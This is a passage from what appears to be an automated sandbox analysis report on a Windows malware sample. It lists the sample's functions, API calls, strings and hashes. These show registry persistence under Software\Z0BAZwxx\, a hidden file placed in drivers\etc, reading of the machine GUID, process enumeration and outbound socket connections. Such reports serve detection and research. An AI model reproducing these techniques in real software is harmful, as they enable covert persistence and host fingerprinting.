                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressAllocHandleLibraryLoadModuleOpenProcProcessQueryValueVirtualWow64
                                                                                                                                                                                                                                                                                            • String ID: %ls$FAILED$MachineGuid$P$Software\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                            • API String ID: 3971681081-1270531343
                                                                                                                                                                                                                                                                                            • Opcode ID: 9493e2a87521952e1b55b8ebdcf98532706999c6ec7bc5287e8c71087c8d8ef6
                                                                                                                                                                                                                                                                                            • Instruction ID: ee9aa70cf1c74c907f64db88cc71ebfd1588477c17623781f346bcce0a6afabf
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9493e2a87521952e1b55b8ebdcf98532706999c6ec7bc5287e8c71087c8d8ef6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6811E672E44318BAEB10A7A5DC47F9E7B648F00759F31003BF645791C2DABC5A409AAD
                                                                                                                                                                                                                                                                                            Function 0040887B Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 120stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 354 40887b-4088ae call 402c68 call 404c49 call 402c68 call 404c49 363 4088b0-4088b2 354->363 364 40891a 354->364 363->364 365 4088b4-4088c6 strstr 363->365 366 40891c-408920 364->366 367 4088c8-4088cb 365->367 368 4088ce-4088dc strstr 365->368 367->368 369 4088e3 368->369 370 4088de-4088e1 368->370 371 4088e5-40890b strstr * 3 369->371 370->371 372 40893d-40893f 371->372 373 40890d-40890f 371->373 372->364 374 408941-408981 call 404b15 * 2 atoi 372->374 375 408921-40893b call 404b15 373->375 376 408911-408919 call 404c38 373->376 384 408983-408986 call 404c38 374->384 375->384 376->364 387 40898b-40899e 384->387 387->366
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • strstr.MSVCRT ref: 004088C0
                                                                                                                                                                                                                                                                                            • strstr.MSVCRT ref: 004088D4
                                                                                                                                                                                                                                                                                            • strstr.MSVCRT ref: 004088EB
                                                                                                                                                                                                                                                                                            • strstr.MSVCRT ref: 004088F6
                                                                                                                                                                                                                                                                                            • strstr.MSVCRT ref: 00408903
                                                                                                                                                                                                                                                                                            • atoi.MSVCRT(?,?,00000000,00000000,?,00000001,00000000), ref: 00408975
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: strstr$AllocVirtualatoi
                                                                                                                                                                                                                                                                                            • String ID: ://$https://
                                                                                                                                                                                                                                                                                            • API String ID: 571728614-1779917511
                                                                                                                                                                                                                                                                                            • Opcode ID: 7cbbc6e2f48da071cbbc83c7112badd04bd626e784661ccb55c408bfa4ad93c4
                                                                                                                                                                                                                                                                                            • Instruction ID: cf151f61cd9de4b96e27ac18cb58804d0dc6bef225bff225e8e7c86b513dcab6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cbbc6e2f48da071cbbc83c7112badd04bd626e784661ccb55c408bfa4ad93c4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB31C371A08205EBDB10AFA9CE85A6E7BA8DF80314F14017FF844B72D1DE389D008A59
                                                                                                                                                                                                                                                                                            Function 0040547F Relevance: 10.6, APIs: 7, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 443 40547f-4054f5 call 40b030 memset * 2 call 407ffb _beginthreadex * 2 448 4054f8-40550d clock call 4083d7 443->448 451 405517 448->451 452 40550f-405515 448->452 453 40551c-405543 _beginthreadex call 406efb 451->453 452->451 452->453 455 405548-405564 call 401038 clock 453->455 455->448 459 405566-405570 455->459 459->448 460 405572-405579 call 401020 459->460 460->448
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004054A6
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004054BC
                                                                                                                                                                                                                                                                                            • _beginthreadex.MSVCRT ref: 004054E1
                                                                                                                                                                                                                                                                                            • _beginthreadex.MSVCRT ref: 004054ED
                                                                                                                                                                                                                                                                                            • clock.MSVCRT ref: 004054F8
                                                                                                                                                                                                                                                                                              • Part of subcall function 004083D7: memset.MSVCRT ref: 004083FA
                                                                                                                                                                                                                                                                                              • Part of subcall function 004083D7: RegOpenKeyExW.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00020019,00405503,?,?,76E86C30,76EB0460), ref: 0040842D
                                                                                                                                                                                                                                                                                            • _beginthreadex.MSVCRT ref: 00405531
                                                                                                                                                                                                                                                                                            • clock.MSVCRT ref: 0040555C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _beginthreadexmemset$clock$Open
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 279234960-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 757b067a59ce54d03419b4fde3b6e820a4f7c257bf3eaeaed28cdf6ec6612a81
                                                                                                                                                                                                                                                                                            • Instruction ID: 28a8490cb83bf233721ee0c2fbe66ac0b832dc45bff05d28b36ec78ff7895cbe
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 757b067a59ce54d03419b4fde3b6e820a4f7c257bf3eaeaed28cdf6ec6612a81
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E821A47681035466D330AB7A9D49D5F7AACEFC5B04F000A3EF994F61D1E6389D048AAE
                                                                                                                                                                                                                                                                                            Function 00405211 Relevance: 9.1, APIs: 6, Instructions: 99sleepprocessCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 463 405211-405237 call 404c49 * 2 468 405239-405270 memset call 406efb CreateToolhelp32Snapshot 463->468 471 405272-405279 call 401038 468->471 472 40527e-405292 call 404f62 468->472 479 40532c-405342 call 406efb Sleep 471->479 477 405294-4052a6 call 4062e9 472->477 478 40530a-405326 call 406efb Process32NextW 472->478 486 4052b1-4052b6 477->486 487 4052a8-4052af 477->487 478->472 478->479 479->468 489 4052c1-4052c6 486->489 490 4052b8-4052bf 486->490 488 4052d6-4052f5 _beginthreadex 487->488 493 4052f8-405308 call 406efb Sleep 488->493 491 4052c8-4052cd 489->491 492 4052cf 489->492 490->488 491->492 491->493 492->488 493->478
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00405246
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00405268
                                                                                                                                                                                                                                                                                            • _beginthreadex.MSVCRT ref: 004052EF
                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(0000000A), ref: 00405308
                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(?,0000022C), ref: 00405322
                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(2FA62CA8), ref: 00405340
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep$AllocCreateNextProcess32SnapshotToolhelp32Virtual_beginthreadexmemset
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 366437478-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 98e7c753959bd9781fafd7c1d3a0c6740d4bf29403812687b81d8c12dc28b4e6
                                                                                                                                                                                                                                                                                            • Instruction ID: d859c7a432dee83c2016690f348989724e2ad2523fa05cc59ebe0d2977a90f8f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98e7c753959bd9781fafd7c1d3a0c6740d4bf29403812687b81d8c12dc28b4e6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F531E8708007046EEB206BB5DC49D6F76A8EF41704F2005BFF455F61C1DA7C9E519E2A
                                                                                                                                                                                                                                                                                            Function 004083D7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 496 4083d7-408431 memset call 406efb RegOpenKeyExW 499 408433-408443 call 401050 496->499 500 408444-40846e call 406efb RegQueryValueExW 496->500 500->499 505 408470-408480 _wtoi 500->505 505->499
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004083FA
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00020019,00405503,?,?,76E86C30,76EB0460), ref: 0040842D
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNELBASE(00405503,0040D114,00000000,00000000,?,00000208,00000000,?,?,76E86C30,76EB0460), ref: 00408469
                                                                                                                                                                                                                                                                                            • _wtoi.MSVCRT(?,?,76E86C30,76EB0460), ref: 00408477
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: OpenQueryValue_wtoimemset
                                                                                                                                                                                                                                                                                            • String ID: Software\Z0BAZwxx\
                                                                                                                                                                                                                                                                                            • API String ID: 4215520229-1921705251
                                                                                                                                                                                                                                                                                            • Opcode ID: d35f9aaef82a7263d78094d1875e815b9ecbdfa7ab8d4cae31d9eb612996cd93
                                                                                                                                                                                                                                                                                            • Instruction ID: 403f48811edb898ac64ce0cb546cf93d896c61d9ac6bab7e0d6e5cdb7f2ab47a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d35f9aaef82a7263d78094d1875e815b9ecbdfa7ab8d4cae31d9eb612996cd93
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84110876A002187AD720A7F4DC89FEF776CDF08794F10057EB615F21C2EAB49A4486A8
                                                                                                                                                                                                                                                                                            Function 00402E20 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B), ref: 00402E3B
                                                                                                                                                                                                                                                                                            • PathAppendW.SHLWAPI(00000000,00408038,?,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E5C
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E65
                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000006,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E72
                                                                                                                                                                                                                                                                                            • PathAppendW.SHLWAPI(00000000,00407E9B,?,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E7C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Path$Append$AllocAttributesCreateDirectoryFileFolderVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3172642931-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c5e1bd7d6f7390fb55f19be4e07d281718f0cd768bfe92574383bb54c8130788
                                                                                                                                                                                                                                                                                            • Instruction ID: 2206e7899cb27381e583c61225154ca2b14266176ec61f989d91304320a3329e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5e1bd7d6f7390fb55f19be4e07d281718f0cd768bfe92574383bb54c8130788
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BF0A472284108BFEB016FB1AE88D7F3B6CDB95759700413AFA04BA1C1CA798C0597B9
                                                                                                                                                                                                                                                                                            Function 00408714 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegCreateKeyExW.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00000000,00000000,000F003F,00000000,004054CD,00000000,00000000,?,?,00408B62,0040CF00,00000000), ref: 00408744
                                                                                                                                                                                                                                                                                            • wcslen.MSVCRT ref: 0040874F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            • RegSetValueExW.KERNELBASE(004054CD,?,00000000,00000001,00408038,00000000,?,?,00408B62,0040CF00,00000000,?,00000000,?,?,00407E96), ref: 00408776
                                                                                                                                                                                                                                                                                              • Part of subcall function 00401050: RegCloseKey.KERNELBASE(ez@,?,00407A65,00000000), ref: 00401064
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCreateLibraryLoadValuewcslen
                                                                                                                                                                                                                                                                                            • String ID: Software\Z0BAZwxx\
                                                                                                                                                                                                                                                                                            • API String ID: 3357561725-1921705251
                                                                                                                                                                                                                                                                                            • Opcode ID: 763f5e605f40beb979aac3107c7bd6545b20bc5e90c6ea7a0af4e7224afad282
                                                                                                                                                                                                                                                                                            • Instruction ID: 70255b9e219390e924199528c16af05d9f3be5b7d2994cc30a7ddb2fe8e5f02d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 763f5e605f40beb979aac3107c7bd6545b20bc5e90c6ea7a0af4e7224afad282
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F01D636140204BEEB205B56ED4AEEF3BA8CBC5B60F20412EFA05B60C1D9B55E41E668
                                                                                                                                                                                                                                                                                            Function 004085B3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004085DF
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00000001,?,?,?,?,00000000), ref: 00408605
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,00000104,00000000,?,00000000,00000104,?,?,?,00000000), ref: 00408631
                                                                                                                                                                                                                                                                                              • Part of subcall function 00401050: RegCloseKey.KERNELBASE(ez@,?,00407A65,00000000), ref: 00401064
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseLibraryLoadOpenQueryValuememset
                                                                                                                                                                                                                                                                                            • String ID: Software\Z0BAZwxx\
                                                                                                                                                                                                                                                                                            • API String ID: 79794857-1921705251
                                                                                                                                                                                                                                                                                            • Opcode ID: 9aebf5d51083ea0474c8114bcbbfa8aa5e9af85ba3a0213b63bf12f4be191991
                                                                                                                                                                                                                                                                                            • Instruction ID: d4a4179242a07c87cd33e05e147c6bacc52d52a803263cec572c3a269d048f28
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9aebf5d51083ea0474c8114bcbbfa8aa5e9af85ba3a0213b63bf12f4be191991
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7401C072800218B6DB25A7A4CC07FDE7B689B15714F1000AEF655B60C1EAB49B84CA98
                                                                                                                                                                                                                                                                                            Function 00407734 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B), ref: 00402E3B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: PathAppendW.SHLWAPI(00000000,00408038,?,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E5C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: CreateDirectoryW.KERNEL32(00000000,00000000,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E65
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: SetFileAttributesW.KERNEL32(00000000,00000006,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E72
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: PathAppendW.SHLWAPI(00000000,00407E9B,?,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E7C
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,00407E9B,00408038,?,004054CD), ref: 0040776D
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,00407E9B,00408038,?,004054CD), ref: 00407781
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Path$AppendCreateFile$AttributesCloseDirectoryFolderHandle
                                                                                                                                                                                                                                                                                            • String ID: drivers\etc$protocol
                                                                                                                                                                                                                                                                                            • API String ID: 3677764628-3772225760
                                                                                                                                                                                                                                                                                            • Opcode ID: d2a4bdb490bef126160427d97cb39f259e7dc4ee22fdfc36632ad028c34fc121
                                                                                                                                                                                                                                                                                            • Instruction ID: 8b8cd05857f767f478aa3daa326e7e21353036edafc4fd69df6466da4ba73d61
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2a4bdb490bef126160427d97cb39f259e7dc4ee22fdfc36632ad028c34fc121
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CE0A9A16C53143AE42033B49CC6FAB118D8B02398F22173BF222B22C2D9BD6D0400AE
                                                                                                                                                                                                                                                                                            Function 00408A90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: wcslen
                                                                                                                                                                                                                                                                                            • String ID: %02X
                                                                                                                                                                                                                                                                                            • API String ID: 4088430540-436463671
                                                                                                                                                                                                                                                                                            • Opcode ID: e6349d7566e542de323579e62f566403a0460e1df081866f0ad2c3d872dac581
                                                                                                                                                                                                                                                                                            • Instruction ID: c04b32fe9950897e0f48e7dafadec2ca4b3f8658286846603aa18106c8baca47
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6349d7566e542de323579e62f566403a0460e1df081866f0ad2c3d872dac581
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6211B4B1A002119ADB205F949B8566EB7F49F05754B24043FF981F73C1EA3C9D418A5D
                                                                                                                                                                                                                                                                                            Function 004071E2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004010CE: socket.WS2_32(00000002,00000001,00000006,004071EE,00000000,00408E7E,?,00407F38,00000000,00000000), ref: 004010E2
                                                                                                                                                                                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00001006,00007530,00000004,00000000,00408E7E,?,00407F38,00000000), ref: 00407223
                                                                                                                                                                                                                                                                                            • connect.WS2_32(00000000,?,00000010), ref: 00407264
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: connectsetsockoptsocket
                                                                                                                                                                                                                                                                                            • String ID: 0u
                                                                                                                                                                                                                                                                                            • API String ID: 509303787-3203441087
                                                                                                                                                                                                                                                                                            • Opcode ID: 29fba23696c62b1143cceafd9ad49f96adefe7539ec21bac43d31b0e29538015
                                                                                                                                                                                                                                                                                            • Instruction ID: 54dbe7a96ca21992bb34ae97e2733eb704755e76610b55cb7b51ce060b14f984
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29fba23696c62b1143cceafd9ad49f96adefe7539ec21bac43d31b0e29538015
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6101A1319553157DEA1077B4EC17EBE26108F00B34F20062FFA61BA1C1EEB85A51629A
                                                                                                                                                                                                                                                                                            Function 00407A86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0040878C: RegOpenKeyExW.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00020019,004054CD,00000000,?,?,?,?,00407A8F,00000000,?,0040803E,?), ref: 004087BA
                                                                                                                                                                                                                                                                                            • wcscpy.MSVCRT ref: 00407B10
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00407AE8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocOpenVirtualwcscpywsprintf
                                                                                                                                                                                                                                                                                            • String ID: %02d.%02d.%04d
                                                                                                                                                                                                                                                                                            • API String ID: 905796295-188738806
                                                                                                                                                                                                                                                                                            • Opcode ID: d85b4b57414d2b2d69aa4a4c4ee4b35fea69bb81168f1ae07f8b2626323ac57a
                                                                                                                                                                                                                                                                                            • Instruction ID: 144bdd79aa9d3822deb6798b3d944f22a97b9f8a5e4431696abbf6aeb2788a6a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d85b4b57414d2b2d69aa4a4c4ee4b35fea69bb81168f1ae07f8b2626323ac57a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D01D8E1544114A6E6207BAADD46A7F32E88EC1B49B05003FF985B72C2EA7C594186BE
                                                                                                                                                                                                                                                                                            Function 0040878C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00020019,004054CD,00000000,?,?,?,?,00407A8F,00000000,?,0040803E,?), ref: 004087BA
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNELBASE(004054CD,0040CC4C,00000000,00000000,00000000,?,?,?,?,00407A8F,00000000,?,0040803E,?,?,004054CD), ref: 00408803
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: OpenQueryValue
                                                                                                                                                                                                                                                                                            • String ID: Software\Z0BAZwxx\
                                                                                                                                                                                                                                                                                            • API String ID: 4153817207-1921705251
                                                                                                                                                                                                                                                                                            • Opcode ID: ea8d534bd058ac273b81175436ace048efae155f41b8cd6d2257d95aecc7b931
